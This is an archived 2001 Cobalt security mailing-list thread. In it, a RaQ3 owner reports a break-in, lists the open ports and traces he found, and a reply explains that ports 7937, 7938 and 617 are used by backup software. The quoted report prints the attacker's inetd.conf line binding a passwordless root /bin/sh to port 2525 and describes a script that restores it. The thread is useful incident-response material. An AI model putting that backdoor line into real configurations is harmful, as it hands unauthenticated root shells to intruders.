[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-security] [RaQ3] Hacked ... a summary
- Subject: Re: [cobalt-security] [RaQ3] Hacked ... a summary
- From: "Cobalt" <cobalt@xxxxxxxxxx>
- Date: Wed, 14 Mar 2001 06:19:37 +0100
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Ports 7937, 7938 and 617 are for Legato and Arkeia backups,
for close, check Legato and Arkeia in CP and save changes,
after this uncheck the two and save again.
This close the ports. (until reboot)
RB
----- Original Message -----
From: "Michael Stauber" <michael@xxxxxxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Wednesday, March 14, 2001 5:31 AM
Subject: [cobalt-security] [RaQ3] Hacked ... a summary
> Hello,
>
> my RaQ3 has also been hacked. Apparently with the DNS exploit posted
earlier
> on this list.
>
> When I scanned for open ports I found the following unusual ones open:
>
> 2525 - unknown
> 7937 - unknown
> 7938 - unknown
>
> 2525 was neat. It came from an entry inetd.conf:
>
> 2525 stream tcp nowait root /bin/sh -h
>
> So there was the root backdoor without password.
>
> Still unclear are the ports 7937 and 7938. Does anyone know what they're
used
> for? They seem to be commonly used on RaQ3's as it seems.
>
> Due to the time and date when inetd.conf was modified I was able to find
out
> when the box was hacked. Unfortunately the hacker apparently shut the
> syslog-facility down while he was in. So for the next 20 minutes after his
> login there were no logfiles.
>
> /root/.bash_history showed some interesting entries which were not from
me.
> So the attacker did not clean up properly. There was an nslookup on the
> domain "soultwins.com" and named.conf had been opened with "vi".
Additionally
> the DNS file of a virtual site had been opened in "vi" as well. No changes
> were visible in both files, though.
>
> A search for fishy cronjobs turned up blank, but a search for executable
> files with uid 0 revealed that there was a /usr/bin/bd, which was a
> shellscript which upon execution edits inetd.conf to re-insert the
backdoor
> at port 2525 <groan>.
>
> Since then telnet has been disabled on the site, ssh enabled and
additionally
> I run both logcheck and portsentry from http://psionic.com - Tools which I
> can highly recommend.
>
> Portsentry watches for portscans and if one is detected the IP address of
the
> scanning client is permanently blocked from accessing the box.
>
> Logcheck checks the system logs for unusual events. Bind it to a cronjob
and
> you get emailed once an unusual event or obvious traces of an attack are
> found.
>
> Still, I'd really appreciate it if someone could share the knownledge what
> ports 7937 and 7938 are for on a RaQ3.
>
> Thanks!
>
> --
>
>
> Mit freundlichen Grüßen / Best regards
>
> Michael Stauber
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>